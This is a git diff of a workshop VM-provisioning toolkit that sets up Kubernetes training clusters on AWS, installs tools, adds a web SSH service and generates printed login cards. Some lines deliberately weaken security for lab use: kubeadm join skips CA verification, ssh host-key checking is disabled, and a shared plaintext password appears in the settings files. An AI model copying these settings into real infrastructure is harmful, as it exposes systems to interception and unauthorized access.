        sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
        sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
        sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
@@ -169,21 +189,22 @@ _cmd_kube() {

    # Install weave as the pod network
    pssh "
-    if grep -q node1 /tmp/node; then
+    if i_am_first_node; then
        kubever=\$(kubectl version | base64 | tr -d '\n') &&
        kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
    fi"

    # Join the other nodes to the cluster
    pssh --timeout 200 "
-    if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
-        TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token) &&
-        sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN node1:6443
+    if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
+        FIRSTNODE=\$(cat /etc/name_of_first_node) &&
+        TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
+        sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
    fi"

    # Install metrics server
    pssh "
-    if grep -q node1 /tmp/node; then
+    if i_am_first_node; then
 	kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
    fi"

@@ -208,7 +229,7 @@ EOF"
    pssh "
    if [ ! -x /usr/local/bin/stern ]; then
        ##VERSION##
-        sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.10.0/stern_linux_amd64 &&
+        sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
        sudo chmod +x /usr/local/bin/stern &&
        stern --completion bash | sudo tee /etc/bash_completion.d/stern
    fi"
@@ -220,6 +241,21 @@ EOF"
        helm completion bash | sudo tee /etc/bash_completion.d/helm
    fi"

+    # Install ship
+    pssh "
+    if [ ! -x /usr/local/bin/ship ]; then
+        curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
+             sudo tar -C /usr/local/bin -zx ship
+    fi"
+
+    # Install the AWS IAM authenticator
+    pssh "
+    if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
+	##VERSION##
+        sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
+	sudo chmod +x /usr/local/bin/aws-iam-authenticator
+    fi"
+
    sep "Done"
 }

@@ -240,10 +276,9 @@ _cmd_kubetest() {
    # Feel free to make that better ♥
    pssh "
    set -e
-    [ -f /tmp/node ]
-    if grep -q node1 /tmp/node; then
+    if i_am_first_node; then
      which kubectl
-      for NODE in \$(awk /\ node/\ {print\ \\\$2} /etc/hosts); do
+      for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
        echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
      done
    fi"
@@ -283,6 +318,14 @@ _cmd_listall() {
    done
 }

+_cmd ping "Ping VMs in a given tag, to check that they have network access"
+_cmd_ping() {
+    TAG=$1
+    need_tag
+    # The tag's address list is fed to fping on stdin; the path is quoted so the tag cannot be word-split.
+    fping < "tags/$TAG/ips.txt"
+}
+
 _cmd netfix "Disable GRO and run a pinger job on the VMs"
 _cmd_netfix () {
    TAG=$1
@@ -356,6 +399,15 @@ _cmd_retag() {
    aws_tag_instances $OLDTAG $NEWTAG
 }

+_cmd ssh "Open an SSH session to the first node of a tag"
+_cmd_ssh() {
+    TAG=$1
+    need_tag
+    IP=$(head -n 1 "tags/$TAG/ips.txt")  # first line of the tag's address list
+    info "Logging into $IP"
+    ssh "docker@$IP"  # logs in as the docker user
+}
+
 _cmd start "Start a group of VMs"
 _cmd_start() {
    while [ ! -z "$*" ]; do
@@ -367,7 +419,7 @@ _cmd_start() {
        *) die "Unrecognized parameter: $1."
        esac
    done
-    
+
    if [ -z "$INFRA" ]; then
        die "Please add --infra flag to specify which infrastructure file to use."
    fi
@@ -378,8 +430,8 @@ _cmd_start() {
        COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
        warning "No --count option was specified. Using value from settings file ($COUNT)."
    fi
-    
-    # Check that the specified settings and infrastructure are valid.        
+
+    # Check that the specified settings and infrastructure are valid.
    need_settings $SETTINGS
    need_infra $INFRA

@@ -451,15 +503,15 @@ _cmd_helmprom() {
    TAG=$1
    need_tag
    pssh "
-    if grep -q node1 /tmp/node; then
+    if i_am_first_node; then
        kubectl -n kube-system get serviceaccount helm ||
            kubectl -n kube-system create serviceaccount helm
-        helm init --service-account helm
+        sudo -u docker -H helm init --service-account helm
        kubectl get clusterrolebinding helm-can-do-everything ||
            kubectl create clusterrolebinding helm-can-do-everything \
                --clusterrole=cluster-admin \
                --serviceaccount=kube-system:helm
-        helm upgrade --install prometheus stable/prometheus \
+        sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
            --namespace kube-system \
            --set server.service.type=NodePort \
            --set server.service.nodePort=30090 \
@@ -484,6 +536,38 @@ _cmd_weavetest() {
    sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
 }

+_cmd webssh "Install a WEB SSH server on the machines (port 1080)"
+_cmd_webssh() {  # each pssh call below sends one script to the VMs of the tag
+    TAG=$1
+    need_tag  # helper defined elsewhere; presumably rejects a missing or unknown tag
+    pssh "
+    sudo apt-get update &&
+    sudo apt-get install python-tornado python-paramiko -y"
+    pssh "
+    [ -d webssh ] || git clone https://github.com/jpetazzo/webssh"
+    pssh "
+    for KEYFILE in /etc/ssh/*.pub; do
+      read a b c < \$KEYFILE; echo localhost \$a \$b
+    done > webssh/known_hosts"
+    pssh "cat >webssh.service <<EOF
+[Unit]
+Description=webssh
+
+[Install]
+WantedBy=multi-user.target
+
+[Service]
+WorkingDirectory=\$PWD/webssh
+ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
+User=nobody
+Group=nogroup
+Restart=always
+EOF"
+    pssh "
+    sudo systemctl enable \$PWD/webssh.service &&
+    sudo systemctl start webssh.service"
+}
+
 greet() {
    IAMUSER=$(aws iam get-user --query 'User.UserName')
    info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
@@ -541,8 +625,8 @@ test_vm() {
    for cmd in "hostname" \
        "whoami" \
        "hostname -i" \
-        "cat /tmp/node" \
-        "cat /tmp/ipv4" \
+        "ls -l /usr/local/bin/i_am_first_node" \
+        "grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
        "cat /etc/hosts" \
        "hostnamectl status" \
        "docker version | grep Version -B1" \
--- a/prepare-vms/lib/infra/aws.sh
+++ b/prepare-vms/lib/infra/aws.sh
@@ -31,6 +31,7 @@ infra_start() {
        die "I could not find which AMI to use in this region. Try another region?"
    fi
    AWS_KEY_NAME=$(make_key_name)
+    AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}

    sep "Starting instances"
    info "         Count: $COUNT"
@@ -38,10 +39,11 @@ infra_start() {
    info "     Token/tag: $TAG"
    info "           AMI: $AMI"
    info "      Key name: $AWS_KEY_NAME"
+    info " Instance type: $AWS_INSTANCE_TYPE"
    result=$(aws ec2 run-instances \
        --key-name $AWS_KEY_NAME \
        --count $COUNT \
-        --instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
+        --instance-type $AWS_INSTANCE_TYPE \
        --client-token $TAG \
        --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
        --image-id $AMI)
@@ -97,7 +99,7 @@ infra_disableaddrchecks() {
 }

 wait_until_tag_is_running() {
-    max_retry=50
+    max_retry=100
    i=0
    done_count=0
    while [[ $done_count -lt $COUNT ]]; do
--- a/prepare-vms/lib/ips-txt-to-html.py
+++ b/prepare-vms/lib/ips-txt-to-html.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 import os
 import sys
 import yaml
--- a/prepare-vms/lib/postprep.py
+++ b/prepare-vms/lib/postprep.py
@@ -12,6 +12,7 @@ config = yaml.load(open("/tmp/settings.yaml"))
 COMPOSE_VERSION = config["compose_version"]
 MACHINE_VERSION = config["machine_version"]
 CLUSTER_SIZE = config["clustersize"]
+CLUSTER_PREFIX = config["clusterprefix"]
 ENGINE_VERSION = config["engine_version"]
 DOCKER_USER_PASSWORD = config["docker_user_password"]

@@ -121,7 +122,7 @@ addresses = list(l.strip() for l in sys.stdin)
 assert ipv4 in addresses

 def makenames(addrs):
-    return [ "node%s"%(i+1) for i in range(len(addrs)) ]
+    return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]

 while addresses:
    cluster = addresses[:CLUSTER_SIZE]
@@ -135,15 +136,21 @@ while addresses:
    print(cluster)

    mynode = cluster.index(ipv4) + 1
-    system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
-    system("echo node{} | sudo tee /etc/hostname".format(mynode))
-    system("sudo hostname node{}".format(mynode))
+    system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
+    system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
    system("sudo -u docker mkdir -p /home/docker/.ssh")
    system("sudo -u docker touch /home/docker/.ssh/authorized_keys")

+    # Create a convenience file to easily check if we're the first node
    if ipv4 == cluster[0]:
-        # If I'm node1 and don't have a private key, generate one (with empty passphrase)
+        system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
+        # On the first node, if we don't have a private key, generate one (with empty passphrase)
        system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
+    else:
+        system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
+    # Record the IPv4 address and name of the first node
+    system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
+    system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))

 FINISH = time.time()
 duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])
--- a/prepare-vms/settings/admin-dmuc.yaml
+++ b/prepare-vms/settings/admin-dmuc.yaml
@@ -1,8 +1,11 @@
 # Number of VMs per cluster
 clustersize: 1

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: dmuc
+
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: enix.html
+cards_template: cards.html

 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: A4
@@ -18,9 +21,8 @@ paper_margin: 0.2in
 engine_version: stable

 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.21.1
+compose_version: 1.24.1
 machine_version: 0.14.0

 # Password used to connect with the "docker user"
 docker_user_password: training
-
--- a/prepare-vms/settings/admin-kubenet.yaml
+++ b/prepare-vms/settings/admin-kubenet.yaml
@@ -0,0 +1,28 @@
+# Number of VMs per cluster
+clustersize: 3
+
+# The hostname of each node will be clusterprefix + a number
+clusterprefix: kubenet
+
+# Jinja2 template to use to generate ready-to-cut cards
+cards_template: cards.html
+
+# Use "Letter" in the US, and "A4" everywhere else
+paper_size: A4
+
+# Feel free to reduce this if your printer can handle it
+paper_margin: 0.2in
+
+# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
+# If you print (or generate a PDF) using ips.html, they will be ignored.
+# (The equivalent parameters must be set from the browser's print dialog.)
+
+# This can be "test" or "stable"
+engine_version: stable
+
+# These correspond to the version numbers visible on their respective GitHub release pages
+compose_version: 1.24.1
+machine_version: 0.14.0
+
+# Password used to connect with the "docker user"
+docker_user_password: training
--- a/prepare-vms/settings/admin-kuberouter.yaml
+++ b/prepare-vms/settings/admin-kuberouter.yaml
@@ -0,0 +1,28 @@
+# Number of VMs per cluster
+clustersize: 3
+
+# The hostname of each node will be clusterprefix + a number
+clusterprefix: kuberouter
+
+# Jinja2 template to use to generate ready-to-cut cards
+cards_template: cards.html
+
+# Use "Letter" in the US, and "A4" everywhere else
+paper_size: A4
+
+# Feel free to reduce this if your printer can handle it
+paper_margin: 0.2in
+
+# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
+# If you print (or generate a PDF) using ips.html, they will be ignored.
+# (The equivalent parameters must be set from the browser's print dialog.)
+
+# This can be "test" or "stable"
+engine_version: stable
+
+# These correspond to the version numbers visible on their respective GitHub release pages
+compose_version: 1.24.1
+machine_version: 0.14.0
+
+# Password used to connect with the "docker user"
+docker_user_password: training
--- a/prepare-vms/settings/admin-test.yaml
+++ b/prepare-vms/settings/admin-test.yaml
@@ -0,0 +1,28 @@
+# Number of VMs per cluster
+clustersize: 3
+
+# The hostname of each node will be clusterprefix + a number
+clusterprefix: test
+
+# Jinja2 template to use to generate ready-to-cut cards
+cards_template: cards.html
+
+# Use "Letter" in the US, and "A4" everywhere else
+paper_size: A4
+
+# Feel free to reduce this if your printer can handle it
+paper_margin: 0.2in
+
+# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
+# If you print (or generate a PDF) using ips.html, they will be ignored.
+# (The equivalent parameters must be set from the browser's print dialog.)
+
+# This can be "test" or "stable"
+engine_version: stable
+
+# These correspond to the version numbers visible on their respective GitHub release pages
+compose_version: 1.24.1
+machine_version: 0.14.0
+
+# Password used to connect with the "docker user"
+docker_user_password: training
--- a/prepare-vms/settings/csv.yaml
+++ b/prepare-vms/settings/csv.yaml
@@ -1,5 +1,8 @@
 # Number of VMs per cluster
 clustersize: 5

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node
+
 # Jinja2 template to use to generate ready-to-cut cards
 cards_template: clusters.csv
--- a/prepare-vms/settings/example.yaml
+++ b/prepare-vms/settings/example.yaml
@@ -3,6 +3,9 @@
 # Number of VMs per cluster
 clustersize: 5

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node
+
 # Jinja2 template to use to generate ready-to-cut cards
 cards_template: cards.html

@@ -20,7 +23,7 @@ paper_margin: 0.2in
 engine_version: test

 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.18.0
+compose_version: 1.24.1
 machine_version: 0.13.0

 # Password used to connect with the "docker user"
--- a/prepare-vms/settings/fundamentals.yaml
+++ b/prepare-vms/settings/fundamentals.yaml
@@ -3,6 +3,9 @@
 # Number of VMs per cluster
 clustersize: 1

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node
+
 # Jinja2 template to use to generate ready-to-cut cards
 cards_template: cards.html

@@ -20,7 +23,7 @@ paper_margin: 0.2in
 engine_version: stable

 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.22.0
+compose_version: 1.24.1
 machine_version: 0.15.0

 # Password used to connect with the "docker user"
--- a/prepare-vms/settings/jerome.yaml
+++ b/prepare-vms/settings/jerome.yaml
@@ -1,11 +1,14 @@
 # Number of VMs per cluster
 clustersize: 4

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node
+
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: jerome.html
+cards_template: cards.html

 # Use "Letter" in the US, and "A4" everywhere else
-paper_size: A4
+paper_size: Letter

 # Feel free to reduce this if your printer can handle it
 paper_margin: 0.2in
@@ -18,7 +21,7 @@ paper_margin: 0.2in
 engine_version: stable

 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.21.1
+compose_version: 1.24.1
 machine_version: 0.14.0

 # Password used to connect with the "docker user"
--- a/prepare-vms/settings/kube101.yaml
+++ b/prepare-vms/settings/kube101.yaml
@@ -3,8 +3,11 @@
 # Number of VMs per cluster
 clustersize: 3

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node
+
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: kube101.html
+cards_template: cards.html

 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: Letter
@@ -20,7 +23,7 @@ paper_margin: 0.2in
 engine_version: stable

 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.21.1
+compose_version: 1.24.1
 machine_version: 0.14.0

 # Password used to connect with the "docker user"
--- a/prepare-vms/settings/swarm.yaml
+++ b/prepare-vms/settings/swarm.yaml
@@ -3,6 +3,9 @@
 # Number of VMs per cluster
 clustersize: 3

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node
+
 # Jinja2 template to use to generate ready-to-cut cards
 cards_template: cards.html

@@ -20,7 +23,7 @@ paper_margin: 0.2in
 engine_version: stable

 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.22.0
+compose_version: 1.24.1
 machine_version: 0.15.0

 # Password used to connect with the "docker user"
--- a/prepare-vms/setup-admin-clusters.sh
+++ b/prepare-vms/setup-admin-clusters.sh
@@ -0,0 +1,66 @@
+#!/bin/sh
+# Start and provision the four groups of VMs for the admin training:
+# admin-dmuc, admin-kubenet and admin-kuberouter on t3a.small instances,
+# then admin-test on t3a.medium instances.
+# All tags share one timestamp prefix, computed once per run.
+# Run it from the directory holding workshopctl and settings/, since both
+# are referenced through relative paths.
+set -e
+
+INFRA=infra/aws-us-west-2
+
+# Presumably the number of attendees: it is used as the VM count for the
+# single-VM group and multiplied by 3 for the groups of 3-node clusters.
+STUDENTS=2
+
+PREFIX=$(date +%Y-%m-%d-%H-%M)
+
+# start_vms SETTINGS COUNT
+#   SETTINGS  base name of a file in settings/ (without the .yaml suffix)
+#   COUNT     total number of VMs to start
+# Sets the global variables SETTINGS and TAG (TAG is "$PREFIX-$SETTINGS"),
+# then runs "workshopctl start" for that tag on the infrastructure $INFRA.
+start_vms() {
+	SETTINGS=$1
+	TAG=$PREFIX-$SETTINGS
+	./workshopctl start \
+		--tag "$TAG" \
+		--infra "$INFRA" \
+		--settings "settings/$SETTINGS.yaml" \
+		--count "$2"
+}
+
+export AWS_INSTANCE_TYPE=t3a.small
+
+# admin-dmuc: one VM per student (clustersize is 1 in its settings file).
+start_vms admin-dmuc "$STUDENTS"
+./workshopctl deploy "$TAG"
+./workshopctl disabledocker "$TAG"
+./workshopctl kubebins "$TAG"
+./workshopctl cards "$TAG"
+
+# admin-kubenet: three VMs per student.
+start_vms admin-kubenet "$((3*$STUDENTS))"
+./workshopctl disableaddrchecks "$TAG"
+./workshopctl deploy "$TAG"
+./workshopctl kubebins "$TAG"
+./workshopctl cards "$TAG"
+
+# admin-kuberouter: three VMs per student.
+start_vms admin-kuberouter "$((3*$STUDENTS))"
+./workshopctl disableaddrchecks "$TAG"
+./workshopctl deploy "$TAG"
+./workshopctl kubebins "$TAG"
+./workshopctl cards "$TAG"
+
+#INFRA=infra/aws-us-west-1
+
+# The remaining group is started with a different instance type.
+export AWS_INSTANCE_TYPE=t3a.medium
+
+# admin-test: three VMs per student; runs "workshopctl kube" with the
+# argument 1.13.5 where the groups above run "workshopctl kubebins".
+start_vms admin-test "$((3*$STUDENTS))"
+./workshopctl deploy "$TAG"
+./workshopctl kube "$TAG" 1.13.5
+./workshopctl cards "$TAG"
--- a/prepare-vms/templates/cards.html
+++ b/prepare-vms/templates/cards.html
@@ -1,29 +1,88 @@
 {# Feel free to customize or override anything in there! #}
-{%- set url = "http://container.training/" -%}
-{%- set pagesize = 12 -%}
-{%- if clustersize == 1 -%}
-    {%- set workshop_name = "Docker workshop" -%}
-    {%- set cluster_or_machine = "machine" -%}
-    {%- set this_or_each = "this" -%}
-    {%- set machine_is_or_machines_are = "machine is" -%}
-    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
-{%- else -%}
-    {%- set workshop_name = "orchestration workshop" -%}
-    {%- set cluster_or_machine = "cluster" -%}
-    {%- set this_or_each = "each" -%}
-    {%- set machine_is_or_machines_are = "machines are" -%}
-    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
-    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
-    {%- set image_src = image_src_swarm -%}
+
+{%- set url = "http://FIXME.container.training/" -%}
+{%- set pagesize = 9 -%}
+{%- set lang = "en" -%}
+{%- set event = "training session" -%}
+{%- set backside = False -%}
+{%- set image = "kube" -%}
+{%- set clusternumber = 100 -%}
+
+{%- set image_src = {
+	"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
+	"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
+	"kube": "https://avatars1.githubusercontent.com/u/13629408",
+	"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
+    }[image] -%}
+{%- if lang == "en" and clustersize == 1 -%}
+	{%- set intro -%}
+	Here is the connection information to your very own
+	machine for this {{ event }}.
+	You can connect to this VM with any SSH client.
+	{%- endset -%}
+    {%- set listhead -%}
+    Your machine is:
+	{%- endset -%}
+{%- endif -%}
+{%- if lang == "en" and clustersize != 1 -%}
+	{%- set intro -%}
+	Here is the connection information to your very own
+	cluster for this {{ event }}.
+	You can connect to each VM with any SSH client.
+	{%- endset -%}
+    {%- set listhead -%}
+    Your machines are:
+	{%- endset -%}
+{%- endif -%}
+{%- if lang == "fr" and clustersize == 1 -%}
+	{%- set intro -%}
+	Voici les informations permettant de se connecter à votre
+	machine pour cette formation.
+	Vous pouvez vous connecter à cette machine virtuelle
+	avec n'importe quel client SSH.
+	{%- endset -%}
+    {%- set listhead -%}
+    Adresse IP:
+	{%- endset -%}
+{%- endif -%}
+{%- if lang == "en" and clusterprefix != "node" -%}
+	{%- set intro -%}
+    Here is the connection information for the
+    <strong>{{ clusterprefix }}</strong> environment.
+	{%- endset -%}
+{%- endif -%}
+{%- if lang == "fr" and clustersize != 1 -%}
+	{%- set intro -%}
+	Voici les informations permettant de se connecter à votre
+	cluster pour cette formation.
+	Vous pouvez vous connecter à chaque machine virtuelle
+	avec n'importe quel client SSH.
+	{%- endset -%}
+    {%- set listhead -%}
+	Adresses IP:
+	{%- endset -%}
+{%- endif -%}
+{%- if lang == "en"  -%}
+	{%- set slides_are_at -%}
+	You can find the slides at:
+	{%- endset -%}
+{%- endif -%}
+{%- if lang == "fr" -%}
+	{%- set slides_are_at -%}
+  	Le support de formation est à l'adresse suivante :
+	{%- endset -%}
 {%- endif -%}
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
 <html>
 <head><style>
+@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
+
 body, table {
    margin: 0;
    padding: 0;
    line-height: 1em;
-    font-size: 14px;
+    font-size: 15px;
+    font-family: 'Slabo 27px';
 }

 table {
@@ -37,24 +96,54 @@ table {
 div {
    float: left;
    border: 1px dotted black;
+    {% if backside %}
+    height: 31%;
+    {% endif %}
    padding-top: 1%;
    padding-bottom: 1%;
    /* columns * (width+left+right) < 100% */
+    /*
    width: 21.5%;
    padding-left: 1.5%;
    padding-right: 1.5%;
+    */
+    /**/
+    width: 30%;
+    padding-left: 1.5%;
+    padding-right: 1.5%;
+    /**/    
 }

 p {
    margin: 0.4em 0 0.4em 0;
 }

+div.back {
+	border: 1px dotted white;
+}
+
+div.back p {
+    margin: 0.5em 1em 0 1em;
+}
+
 img {
    height: 4em;
    float: right;
-    margin-right: -0.4em;
+    margin-right: -0.2em;
 }

+/*
+img.enix {
+    height: 4.0em;
+    margin-top: 0.4em;
+}
+
+img.kube {
+    height: 4.2em;
+    margin-top: 1.7em;
+}
+*/
+
 .logpass {
    font-family: monospace;
    font-weight: bold;
@@ -69,19 +158,15 @@ img {
 </style></head>
 <body>
 {% for cluster in clusters %}
-    {% if loop.index0>0 and loop.index0%pagesize==0 %}
-        <span class="pagebreak"></span>
-    {% endif %}
    <div>
-
-        <p>
-            Here is the connection information to your very own
-            {{ cluster_or_machine }} for this {{ workshop_name }}.
-            You can connect to {{ this_or_each }} VM with any SSH client.
-        </p>
+        <p>{{ intro }}</p>
        <p>
            <img src="{{ image_src }}" />
            <table>
+            	{% if clusternumber != None %}
+	            <tr><td>cluster:</td></tr>
+	            <tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
+            	{% endif %}
                <tr><td>login:</td></tr>
                <tr><td class="logpass">docker</td></tr>
                <tr><td>password:</td></tr>
@@ -90,17 +175,44 @@ img {

        </p>
        <p>
-            Your {{ machine_is_or_machines_are }}:
+            {{ listhead }}
            <table>
                {% for node in cluster %}
-                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
+                <tr>
+                	<td>{{ clusterprefix }}{{ loop.index }}:</td>
+                	<td>{{ node }}</td>
+                </tr>
                {% endfor %}
            </table>
        </p>
-        <p>You can find the slides at:
+
+        <p>
+        	{{ slides_are_at }}
            <center>{{ url }}</center>
        </p>
    </div>
+    {% if loop.index%pagesize==0 or loop.last %}
+        <span class="pagebreak"></span>
+        {% if backside %}
+			{% for x in range(pagesize) %}
+		        <div class="back">
+		        <br/>
+				<p>You got this at the workshop
+				"Getting Started With Kubernetes and Container Orchestration"
+				during QCON London (March 2019).</p>
+				<p>If you liked that workshop,
+				I can train your team or organization
+				on Docker, container, and Kubernetes,
+				with curriculums of 1 to 5 days.
+				</p>
+				<p>Interested? Contact me at:</p>
+				<p>jerome.petazzoni@gmail.com</p>
+				<p>Thank you!</p>
+		        </div>
+			{% endfor %}
+		<span class="pagebreak"></span>
+		{% endif %}
+    {% endif %}
 {% endfor %}
 </body>
 </html>
--- a/prepare-vms/templates/enix.html
+++ b/prepare-vms/templates/enix.html
@@ -1,121 +0,0 @@
-{# Feel free to customize or override anything in there! #}
-{%- set url = "http://FIXME.container.training" -%}
-{%- set pagesize = 9 -%}
-{%- if clustersize == 1 -%}
-    {%- set workshop_name = "Docker workshop" -%}
-    {%- set cluster_or_machine = "machine virtuelle" -%}
-    {%- set this_or_each = "cette" -%}
-    {%- set plural = "" -%}
-    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
-{%- else -%}
-    {%- set workshop_name = "Kubernetes workshop" -%}
-    {%- set cluster_or_machine = "cluster" -%}
-    {%- set this_or_each = "chaque" -%}
-    {%- set plural = "s" -%}
-    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
-    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
-    {%- set image_src = image_src_kube -%}
-{%- endif -%}
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
-<html>
-<head><style>
-@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
-
-body, table {
-    margin: 0;
-    padding: 0;
-    line-height: 1em;
-    font-size: 15px;
-    font-family: 'Slabo 27px';
-}
-
-table {
-    border-spacing: 0;
-    margin-top: 0.4em;
-    margin-bottom: 0.4em;
-    border-left: 0.8em double grey;
-    padding-left: 0.4em;
-}
-
-div {
-    float: left;
-    border: 1px dotted black;
-    padding-top: 1%;
-    padding-bottom: 1%;
-    /* columns * (width+left+right) < 100% */
-    width: 30%;
-    padding-left: 1.5%;
-    padding-right: 1.5%;
-}
-
-p {
-    margin: 0.4em 0 0.4em 0;
-}
-
-img {
-    height: 4em;
-    float: right;
-    margin-right: -0.3em;
-}
-
-img.enix {
-    height: 4.0em;
-    margin-top: 0.4em;
-}
-
-img.kube {
-    height: 4.2em;
-    margin-top: 1.7em;
-}
-
-.logpass {
-    font-family: monospace;
-    font-weight: bold;
-}
-
-.pagebreak {
-    page-break-after: always;
-    clear: both;
-    display: block;
-    height: 8px;
-}
-</style></head>
-<body>
-{% for cluster in clusters %}
-    {% if loop.index0>0 and loop.index0%pagesize==0 %}
-        <span class="pagebreak"></span>
-    {% endif %}
-    <div>
-
-        <p>
-            Voici les informations permettant de se connecter à votre
-	    {{ cluster_or_machine }} pour cette formation.
-	    Vous pouvez vous connecter à {{ this_or_each }} machine virtuelle
-	    avec n'importe quel client SSH.
-        </p>
-        <p>
-	    <img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
-            <table>
-                <tr><td>identifiant:</td></tr>
-                <tr><td class="logpass">docker</td></tr>
-                <tr><td>mot de passe:</td></tr>
-                <tr><td class="logpass">{{ docker_user_password }}</td></tr>
-            </table>
-
-        </p>
-        <p>
-	Adresse{{ plural }} IP :
-	<!--<img class="kube" src="{{ image_src }}" />-->
-            <table>
-                {% for node in cluster %}
-                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
-                {% endfor %}
-            </table>
-        </p>
-        <p>Le support de formation est à l'adresse suivante :
-            <center>{{ url }}</center>
-        </p>
-    </div>
-{% endfor %}
-</body>
-</html>
--- a/prepare-vms/templates/jerome.html
+++ b/prepare-vms/templates/jerome.html
@@ -1,134 +0,0 @@
-{# Feel free to customize or override anything in there! #}
-{%- set url = "http://qconuk2019.container.training/" -%}
-{%- set pagesize = 9 -%}
-{%- if clustersize == 1 -%}
-    {%- set workshop_name = "Docker workshop" -%}
-    {%- set cluster_or_machine = "machine" -%}
-    {%- set this_or_each = "this" -%}
-    {%- set machine_is_or_machines_are = "machine is" -%}
-    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
-{%- else -%}
-    {%- set workshop_name = "Kubernetes workshop" -%}
-    {%- set cluster_or_machine = "cluster" -%}
-    {%- set this_or_each = "each" -%}
-    {%- set machine_is_or_machines_are = "machines are" -%}
-    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
-    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
-    {%- set image_src = image_src_kube -%}
-{%- endif -%}
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
-<html>
-<head><style>
-@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
